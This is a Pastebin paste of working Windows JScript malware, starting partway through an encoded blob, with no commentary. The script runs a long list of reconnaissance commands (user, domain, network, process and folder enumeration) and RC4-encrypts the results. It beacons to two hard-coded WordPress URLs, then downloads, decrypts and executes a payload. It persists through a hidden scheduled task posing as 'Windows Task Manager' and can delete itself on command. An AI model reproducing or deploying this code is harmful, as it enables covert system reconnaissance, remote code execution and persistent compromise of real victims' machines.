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";
  191.     return qGxZ;
  192. }
  193. ## ---- decoded eval
  194. function UspD(zDmy) {
  195.     var m3mH = WScript.CreateObject("ADODB.Stream")
  196.     m3mH.Type = 2;
  197.     m3mH.CharSet = '437';
  198.    m3mH.Open();
  199.     m3mH.LoadFromFile(zDmy);
  200.     var c0xi = m3mH.ReadText;
  201.     m3mH.Close();
  202.     return cz_b(c0xi);
  203. }
  204. var CKpR = new Array("http://www.saipadiesel124.com/wp-content/plugins/imsanity/tmp.php", "http://www.folk-cantabria.com/wp-content/plugins/wp-statistics/includes/classes/gallery_create_page_field.php");
  205. var tpO8 = "w3LxnRSbJcqf8HrU";
  206. var auME = new Array("systeminfo > ", "net view >> ", "net view /domain >> ", "tasklist /v >> ", "gpresult /z >> ", "netstat -nao >> ", "ipconfig /all >> ", "arp -a >> ", "net share >> ", "net use >> ", "net user >> ", "net user administrator >> ", "net user /domain >> ", "net user administrator /domain >> ", "set  >> ", "dir %systemdrive%\x5cUsers\x5c*.* >> ", "dir %userprofile%\x5cAppData\x5cRoaming\x5cMicrosoft\x5cWindows\x5cRecent\x5c*.* >> ", "dir %userprofile%\x5cDesktop\x5c*.* >> ", "tasklist /fi \x22modules eq wow64.dll\x22  >> ", "tasklist /fi \x22modules ne wow64.dll\x22 >> ", "dir \x22%programfiles(x86)%\x22 >> ", "dir \x22%programfiles%\x22 >> ", "dir %appdata% >>");
  207. var QUjy = new ActiveXObject("Scripting.FileSystemObject");
  208. var LIxF = WScript.ScriptName;
  209. var w5mY = "";
  210. var ruGx = TfOh();
  211.  
  212. function hLit(XngP, y1qa) {
  213.     char_set = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
  214.     var Rj3c = "";
  215.     var OKpB = "";
  216.     for (var i = 0; i < XngP.length; ++i) {
  217.         var B8wU = XngP.charCodeAt(i);
  218.         var LUxg = B8wU.toString(2);
  219.         while (LUxg.length < (y1qa ? 8 : 16))
  220.             LUxg = "0" + LUxg;
  221.         OKpB += LUxg;
  222.         while (OKpB.length >= 6) {
  223.             var vjUu = OKpB.slice(0, 6);
  224.             OKpB = OKpB.slice(6);
  225.             Rj3c += this.char_set.charAt(parseInt(vjUu, 2));
  226.         }
  227.     }
  228.     if (OKpB) {
  229.         while (OKpB.length < 6) OKpB += "0";
  230.         Rj3c += this.char_set.charAt(parseInt(OKpB, 2));
  231.     }
  232.     while (Rj3c.length % (y1qa ? 4 : 8) != 0)
  233.         Rj3c += "=";
  234.     return Rj3c;
  235. }
  236. var b92A = [];
  237. b92A['C7'] = '80';
  238. b92A['FC'] = '81';
  239. b92A['E9'] = '82';
  240. b92A['E2'] = '83';
  241. b92A['E4'] = '84';
  242. b92A['E0'] = '85';
  243. b92A['E5'] = '86';
  244. b92A['E7'] = '87';
  245. b92A['EA'] = '88';
  246. b92A['EB'] = '89';
  247. b92A['E8'] = '8A';
  248. b92A['EF'] = '8B';
  249. b92A['EE'] = '8C';
  250. b92A['EC'] = '8D';
  251. b92A['C4'] = '8E';
  252. b92A['C5'] = '8F';
  253. b92A['C9'] = '90';
  254. b92A['E6'] = '91';
  255. b92A['C6'] = '92';
  256. b92A['F4'] = '93';
  257. b92A['F6'] = '94';
  258. b92A['F2'] = '95';
  259. b92A['FB'] = '96';
  260. b92A['F9'] = '97';
  261. b92A['FF'] = '98';
  262. b92A['D6'] = '99';
  263. b92A['DC'] = '9A';
  264. b92A['A2'] = '9B';
  265. b92A['A3'] = '9C';
  266. b92A['A5'] = '9D';
  267. b92A['20A7'] = '9E';
  268. b92A['192'] = '9F';
  269. b92A['E1'] = 'A0';
  270. b92A['ED'] = 'A1';
  271. b92A['F3'] = 'A2';
  272. b92A['FA'] = 'A3';
  273. b92A['F1'] = 'A4';
  274. b92A['D1'] = 'A5';
  275. b92A['AA'] = 'A6';
  276. b92A['BA'] = 'A7';
  277. b92A['BF'] = 'A8';
  278. b92A['2310'] = 'A9';
  279. b92A['AC'] = 'AA';
  280. b92A['BD'] = 'AB';
  281. b92A['BC'] = 'AC';
  282. b92A['A1'] = 'AD';
  283. b92A['AB'] = 'AE';
  284. b92A['BB'] = 'AF';
  285. b92A['2591'] = 'B0';
  286. b92A['2592'] = 'B1';
  287. b92A['2593'] = 'B2';
  288. b92A['2502'] = 'B3';
  289. b92A['2524'] = 'B4';
  290. b92A['2561'] = 'B5';
  291. b92A['2562'] = 'B6';
  292. b92A['2556'] = 'B7';
  293. b92A['2555'] = 'B8';
  294. b92A['2563'] = 'B9';
  295. b92A['2551'] = 'BA';
  296. b92A['2557'] = 'BB';
  297. b92A['255D'] = 'BC';
  298. b92A['255C'] = 'BD';
  299. b92A['255B'] = 'BE';
  300. b92A['2510'] = 'BF';
  301. b92A['2514'] = 'C0';
  302. b92A['2534'] = 'C1';
  303. b92A['252C'] = 'C2';
  304. b92A['251C'] = 'C3';
  305. b92A['2500'] = 'C4';
  306. b92A['253C'] = 'C5';
  307. b92A['255E'] = 'C6';
  308. b92A['255F'] = 'C7';
  309. b92A['255A'] = 'C8';
  310. b92A['2554'] = 'C9';
  311. b92A['2569'] = 'CA';
  312. b92A['2566'] = 'CB';
  313. b92A['2560'] = 'CC';
  314. b92A['2550'] = 'CD';
  315. b92A['256C'] = 'CE';
  316. b92A['2567'] = 'CF';
  317. b92A['2568'] = 'D0';
  318. b92A['2564'] = 'D1';
  319. b92A['2565'] = 'D2';
  320. b92A['2559'] = 'D3';
  321. b92A['2558'] = 'D4';
  322. b92A['2552'] = 'D5';
  323. b92A['2553'] = 'D6';
  324. b92A['256B'] = 'D7';
  325. b92A['256A'] = 'D8';
  326. b92A['2518'] = 'D9';
  327. b92A['250C'] = 'DA';
  328. b92A['2588'] = 'DB';
  329. b92A['2584'] = 'DC';
  330. b92A['258C'] = 'DD';
  331. b92A['2590'] = 'DE';
  332. b92A['2580'] = 'DF';
  333. b92A['3B1'] = 'E0';
  334. b92A['DF'] = 'E1';
  335. b92A['393'] = 'E2';
  336. b92A['3C0'] = 'E3';
  337. b92A['3A3'] = 'E4';
  338. b92A['3C3'] = 'E5';
  339. b92A['B5'] = 'E6';
  340. b92A['3C4'] = 'E7';
  341. b92A['3A6'] = 'E8';
  342. b92A['398'] = 'E9';
  343. b92A['3A9'] = 'EA';
  344. b92A['3B4'] = 'EB';
  345. b92A['221E'] = 'EC';
  346. b92A['3C6'] = 'ED';
  347. b92A['3B5'] = 'EE';
  348. b92A['2229'] = 'EF';
  349. b92A['2261'] = 'F0';
  350. b92A['B1'] = 'F1';
  351. b92A['2265'] = 'F2';
  352. b92A['2264'] = 'F3';
  353. b92A['2320'] = 'F4';
  354. b92A['2321'] = 'F5';
  355. b92A['F7'] = 'F6';
  356. b92A['2248'] = 'F7';
  357. b92A['B0'] = 'F8';
  358. b92A['2219'] = 'F9';
  359. b92A['B7'] = 'FA';
  360. b92A['221A'] = 'FB';
  361. b92A['207F'] = 'FC';
  362. b92A['B2'] = 'FD';
  363. b92A['25A0'] = 'FE';
  364. b92A['A0'] = 'FF';
  365.  
  366. function TfOh() {
  367.     var ayuh = Math.ceil(Math.random() * 10 + 25);
  368.     var name = String.fromCharCode(Math.ceil(Math.random() * 24 + 65));
  369.     var dc9V = WScript.CreateObject("WScript.Network");
  370.     w5mY = dc9V.UserName;
  371.     for (var count = 0; count < ayuh; count++) {
  372.         switch (Math.ceil(Math.random() * 3)) {
  373.             case 1:
  374.                 name = name + Math.ceil(Math.random() * 8);
  375.                 break;
  376.             case 2:
  377.                 name = name + String.fromCharCode(Math.ceil(Math.random() * 24 + 97));
  378.                 break;
  379.             default:
  380.                 name = name + String.fromCharCode(Math.ceil(Math.random() * 24 + 65));
  381.                 break;
  382.         }
  383.     }
  384.     return name;
  385. }
  386. var wyKN = Blgx(bIdG());
  387. try {
  388.     var WE86 = bIdG();
  389.     rGcR();
  390.     jSm8();
  391. } catch (e) {
  392.     WScript.Quit();
  393. }
  394.  
  395. function jSm8() {
  396.     var c9lr = Fv6b();
  397.     while (true) {
  398.         for (var i = 0; i < CKpR.length; i++) {
  399.             var Ysyo = CKpR[i];
  400.             var f3cb = XEWG(Ysyo, c9lr);
  401.             switch (f3cb) {
  402.                 case "good":
  403.                     break;
  404.                 case "exit":
  405.                     WScript.Quit();
  406.                     break;
  407.                 case "work":
  408.                     XBL3(Ysyo);
  409.                     break;
  410.                 case "fail":
  411.                     tbMu();
  412.                     break;
  413.                 default:
  414.                     break;
  415.             }
  416.             TfOh();
  417.         }
  418.         WScript.Sleep((Math.random() * 300 + 3600) * 1000);
  419.     }
  420. }
  421.  
  422. function bIdG() {
  423.     var spq3 = this['\u0041\u0063\u0074i\u0076eX\u004F\u0062j\u0065c\u0074'];
  424.    var zBVv = new spq3('\u0057\u0053cr\u0069\u0070\u0074\u002E\u0053he\u006C\u006C');
  425.    return zBVv;
  426. }
  427.  
  428. function XBL3(B_TG) {
  429.     var YIme = wyKN + LIxF.substring(0, LIxF.length - 2) + "pif";
  430.     var Kpxo = new ActiveXObject("MSXML2.XMLHTTP");
  431.     Kpxo.OPEN("post", B_TG, false);
  432.     Kpxo.SETREQUESTHEADER("user-agent:", "Mozilla/5.0 (Windows NT 6.1; Win64; x64); " + Sz8k());
  433.     Kpxo.SETREQUESTHEADER("content-type:", "application/octet-stream");
  434.     Kpxo.SETREQUESTHEADER("content-length:", "4");
  435.     Kpxo.SEND("work");
  436.     if (QUjy.FILEEXISTS(YIme)) {
  437.         QUjy.DELETEFILE(YIme);
  438.     }
  439.     if (Kpxo.STATUS == 200) {
  440.         var m3mH = new ActiveXObject("ADODB.STREAM");
  441.         m3mH.TYPE = 1;
  442.         m3mH.OPEN();
  443.         m3mH.WRITE(Kpxo.responseBody);
  444.         m3mH.Position = 0;
  445.         m3mH.Type = 2;
  446.         m3mH.CharSet = "437";
  447.         var c0xi = m3mH.ReadText(m3mH.Size);
  448.         var ptF0 = FXx9("2f532d6baec3d0ec7b1f98aed4774843", cz_b(c0xi));
  449.         NoRS(ptF0, YIme);
  450.         m3mH.Close();
  451.     }
  452.     var ruGx = TfOh();
  453.     c5ae(YIme, B_TG);
  454.     WScript.Sleep(30000);
  455.     QUjy.DELETEFILE(YIme);
  456. }
  457.  
  458. function tbMu() {
  459.     QUjy.DELETEFILE(WScript.SCRIPTFULLNAME);
  460.     eV_C("TaskManager", "Windows Task Manager", w5mY, v_FileName, "EzZETcSXyKAdF_e5I2i1", wyKN, false);
  461.     KhDn("TaskManager");
  462.     WScript.Quit();
  463. }
  464.  
  465. function XEWG(uXHK, hm2j) {
  466.     try {
  467.         var Kpxo = new ActiveXObject("MSXML2.XMLHTTP");
  468.         Kpxo.OPEN("post", uXHK, false);
  469.         Kpxo.SETREQUESTHEADER("user-agent:", "Mozilla/5.0 (Windows NT 6.1; Win64; x64); " + Sz8k());
  470.         Kpxo.SETREQUESTHEADER("content-type:", "application/octet-stream");
  471.         var rRi3 = hLit(hm2j, true);
  472.         Kpxo.SETREQUESTHEADER("content-length:", rRi3.length);
  473.         Kpxo.SEND(rRi3);
  474.         return Kpxo.responseText;
  475.     } catch (e) {
  476.         return "";
  477.     }
  478. }
  479.  
  480. function Sz8k() {
  481.     var n9mV = "";
  482.     var dc9V = WScript.CreateObject("WScript.Network");
  483.     var rRi3 = tpO8 + dc9V.ComputerName + w5mY;
  484.     for (var i = 0; i < 16; i++) {
  485.         var YsXA = 0
  486.         for (var j = i; j < rRi3.length - 1; j++) {
  487.             YsXA = YsXA ^ rRi3.charCodeAt(j);
  488.         }
  489.         YsXA = (YsXA % 10);
  490.         n9mV = n9mV + YsXA.toString(10);
  491.     }
  492.     n9mV = n9mV + tpO8;
  493.     return n9mV;
  494. }
  495.  
  496. function rGcR() {
  497.     v_FileName = wyKN + LIxF.substring(0, LIxF.length - 2) + "js";
  498.     QUjy.COPYFILE(WScript.ScriptFullName, wyKN + LIxF);
  499.     var HFp7 = (Math.random() * 150 + 350) * 1000;
  500.     WScript.Sleep(HFp7);
  501.     eV_C("TaskManager", "Windows Task Manager", w5mY, v_FileName, "EzZETcSXyKAdF_e5I2i1", wyKN, true);
  502. }
  503.  
  504. function Fv6b() {
  505.     var m_Rr = wyKN + "~dat.tmp";
  506.     for (var i = 0; i < auME.length; i++) {
  507.         WE86.Run("cmd.exe /c " + auME[i] + "\x22" + m_Rr + "\x22", 0, true);
  508.     }
  509.     var nRVN = UspD(m_Rr);
  510.     WScript.Sleep(1000);
  511.     QUjy.DELETEFILE(m_Rr);
  512.     return FXx9("2f532d6baec3d0ec7b1f98aed4774843", nRVN);
  513. }
  514.  
  515. function c5ae(YIme, B_TG) {
  516.     try {
  517.         if (QUjy.FILEEXISTS(YIme)) {
  518.             WE86.Run("\x22" + YIme + "\x22");
  519.         }
  520.     } catch (e) {
  521.         var Kpxo = new ActiveXObject("MSXML2.XMLHTTP");
  522.         Kpxo.OPEN("post", B_TG, false);
  523.         var ePMy = "error";
  524.         Kpxo.SETREQUESTHEADER("user-agent:", "Mozilla/5.0 (Windows NT 6.1; Win64; x64); " + Sz8k());
  525.         Kpxo.SETREQUESTHEADER("content-type:", "application/octet-stream");
  526.         Kpxo.SETREQUESTHEADER("content-length:", ePMy.length);
  527.         Kpxo.SEND(ePMy);
  528.         return "";
  529.     }
  530. }
  531.  
  532. function RPbY(r_X5) {
  533.     var w8rG = "0123456789ABCDEF";
  534.     var yjrw = w8rG.substr(r_X5 & 15, 1);
  535.     while (r_X5 > 15) {
  536.         r_X5 >>>= 4;
  537.         yjrw = w8rG.substr(r_X5 & 15, 1) + yjrw;
  538.     }
  539.     return yjrw;
  540. }
  541.  
  542. function NptO(jlEi) {
  543.     return parseInt(jlEi, 16);
  544. }
  545.  
  546. function eV_C(Bjmr, RT6x, O7Ec, YBwP, T9Px, egNr, rmGH) {
  547.     try {
  548.         var BGfI = WScript.CreateObject("Schedule.Service");
  549.         BGfI.Connect();
  550.         var w2cQ = BGfI.GetFolder("WPD");
  551.         var xSm3 = BGfI.NewTask(0);
  552.         xSm3.Principal.UserId = O7Ec;
  553.         xSm3.Principal.LogonType = 6;
  554.         var wK2F = xSm3.RegistrationInfo;
  555.         wK2F.Description = RT6x;
  556.         wK2F.Author = O7Ec;
  557.         var aYbx = xSm3.Settings;
  558.         aYbx.Enabled = true;
  559.         aYbx.StartWhenAvailable = true;
  560.         aYbx.Hidden = rmGH;
  561.         var oSP7 = "2015-07-12T11:47:24";
  562.         var svaG = "2020-03-21T08:00:00";
  563.         var LDoN = xSm3.Triggers;
  564.         var r9EC = LDoN.Create(9);
  565.         r9EC.StartBoundary = oSP7;
  566.         r9EC.EndBoundary = svaG;
  567.         r9EC.Id = "LogonTriggerId";
  568.         r9EC.UserId = O7Ec;
  569.         r9EC.Enabled = true;
  570.         var gQu9 = xSm3.Actions.Create(0);
  571.         gQu9.Path = YBwP;
  572.         gQu9.Arguments = T9Px;
  573.         gQu9.WorkingDirectory = egNr;
  574.         w2cQ.RegisterTaskDefinition(Bjmr, xSm3, 6, "", "", 3);
  575.         return true;
  576.     } catch (Err) {
  577.         return false;
  578.     }
  579. }
  580.  
  581. function KhDn(Bjmr) {
  582.     try {
  583.         var UGgw = false;
  584.         var BGfI = WScript.CreateObject("Schedule.Service");
  585.         BGfI.Connect()
  586.  
  587.  
  588.         var w2cQ = BGfI.GetFolder("WPD");
  589.         var FLs6 = w2cQ.GetTasks(0);
  590.         if (FLs6.count >= 0) {
  591.             var gk1H = new Enumerator(FLs6);
  592.             for (; !gk1H.atEnd(); gk1H.moveNext()) {
  593.                 if (gk1H.item().name == Bjmr) {
  594.                     w2cQ.DeleteTask(Bjmr, 0);
  595.                     UGgw = true;
  596.                 }
  597.             }
  598.         }
  599.     } catch (Err) {
  600.         return false;
  601.     }
  602. }
  603.  
  604. function cz_b(S3Ws) {
  605.     var n9mV = [];
  606.     var mvAu = S3Ws.length;
  607.     for (var i = 0; i < mvAu; i++) {
  608.         var wtVX = S3Ws.charCodeAt(i);
  609.         if (wtVX >= 128) {
  610.             var h = b92A['' + RPbY(wtVX)];
  611.            wtVX = NptO(h);
  612.         }
  613.         n9mV.push(wtVX);
  614.     }
  615.     return n9mV;
  616. }
  617.  
  618. function NoRS(ExY2, igeK) {
  619.     var m3mH = WScript.CreateObject("ADODB.Stream");
  620.     m3mH.type = 2;
  621.     m3mH.Charset = "iso-8859-1";
  622.     m3mH.Open();
  623.     m3mH.WriteText(ExY2);
  624.     m3mH.Flush();
  625.     m3mH.Position = 0;
  626.     m3mH.SaveToFile(igeK, 2);
  627.     m3mH.close();
  628. }
  629.  
  630. function Blgx(gaWo) {
  631.     wyKN = "c:\x5cUsers\x5c" + w5mY + "\x5cAppData\x5cLocal\x5cMicrosoft\x5cWindows\x5c";
  632.     if (!QUjy.FOLDEREXISTS(wyKN))
  633.         wyKN = "c:\x5cUsers\x5c" + w5mY + "\x5cAppData\x5cLocal\x5cTemp\x5c";
  634.     if (!QUjy.FOLDEREXISTS(wyKN))
  635.         wyKN = "c:\x5cDocuments and Settings\x5c" + w5mY + "\x5cApplication Data\x5cMicrosoft\x5cWindows\x5c";
  636.     return wyKN
  637. }
  638.  
  639. function FXx9(Z_3F, VMd7) {
  640.     var NNSX = [];
  641.     var JDro = 0;
  642.     var KagY;
  643.     var n9mV = '';
  644.    for (var i = 0; i < 256; i++) {
  645.         NNSX[i] = i;
  646.     }
  647.     for (var i = 0; i < 256; i++) {
  648.         JDro = (JDro + NNSX[i] + Z_3F.charCodeAt(i % Z_3F.length)) % 256;
  649.         KagY = NNSX[i];
  650.         NNSX[i] = NNSX[JDro];
  651.         NNSX[JDro] = KagY;
  652.     }
  653.     var i = 0;
  654.     var JDro = 0;
  655.     for (var y = 0; y < VMd7.length; y++) {
  656.         i = (i + 1) % 256;
  657.         JDro = (JDro + NNSX[i]) % 256;
  658.         KagY = NNSX[i];
  659.         NNSX[i] = NNSX[JDro];
  660.         NNSX[JDro] = KagY;
  661.         n9mV += String.fromCharCode(VMd7[y] ^ NNSX[(NNSX[i] + NNSX[JDro]) % 256]);
  662.     }
  663.     return n9mV;
  664. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!